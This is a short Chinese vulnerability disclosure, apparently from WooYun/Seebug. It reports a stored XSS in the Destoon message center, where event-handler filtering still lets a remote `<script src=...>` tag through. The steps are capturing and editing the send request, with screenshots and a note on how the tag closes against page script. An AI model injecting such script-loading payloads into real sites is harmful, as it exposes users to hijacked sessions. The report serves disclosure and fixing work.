### 简要描述:
destoon新版短消息中心xss指谁打谁(二)。
### 详细说明:
之前对带有"on"的都进行了过滤,增加了难度
首先选取一个对象我们去发消息
可是这次发现了基本的`<script src=http://www.wooyun.org></script>`都没过滤..
[<img src="https://images.seebug.org/upload/201404/021448182feba8e65e72a7c576c44eaffa60dfcb.jpg" alt="xss.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/021448182feba8e65e72a7c576c44eaffa60dfcb.jpg)
然后抓包,往里面填充我们的xss代码
[<img src="https://images.seebug.org/upload/201404/02144909e5a866e6d7c141b68831f1485ce2d801.jpg" alt="xss2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/02144909e5a866e6d7c141b68831f1485ce2d801.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201404/02145020cf3296e2cc6b561042ca11a29b1b2273.jpg" alt="xss3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/02145020cf3296e2cc6b561042ca11a29b1b2273.jpg)
[<img src="https://images.seebug.org/upload/201404/021502230ea5954f5fbc144befe9e7ff3de959a0.jpg" alt="xss4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/021502230ea5954f5fbc144befe9e7ff3de959a0.jpg)
发现有网络建立了
[<img src="https://images.seebug.org/upload/201404/02150407adbcf9b7f5f8647999c7f34992d19f90.jpg" alt="xss5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/02150407adbcf9b7f5f8647999c7f34992d19f90.jpg)
仔细查看原来是`<script src=http://www.wooyun.org>`跟`<script type="text/javascript">s('message');m('inbox');</script>`进行闭合了,难怪中间部分没了
暂无评论